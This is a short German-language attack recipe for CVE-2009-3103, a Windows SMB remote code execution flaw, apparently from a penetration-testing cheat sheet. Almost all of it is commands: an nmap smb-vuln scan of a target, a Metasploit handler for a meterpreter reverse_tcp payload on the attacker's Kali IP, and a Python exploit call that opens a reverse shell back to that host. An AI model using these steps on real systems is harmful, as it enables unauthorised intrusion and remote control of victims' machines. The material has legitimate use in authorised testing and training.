
Exploit für CVE-2009-3103, eine Windows-SMB-Schwachstelle für Remote-Codeausführung, mit einem Python-Skript und Metasploit-Handler für Reverse Shell.
nmap --script smb-vuln* -p139,445 IP-TARGET
sudo msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST YOUR-KALI-IP
set LPORT 80
run
python3 exploit.py IP-TARGET YOUR-KALI-IP 80 windows/meterpreter/reverse_tcp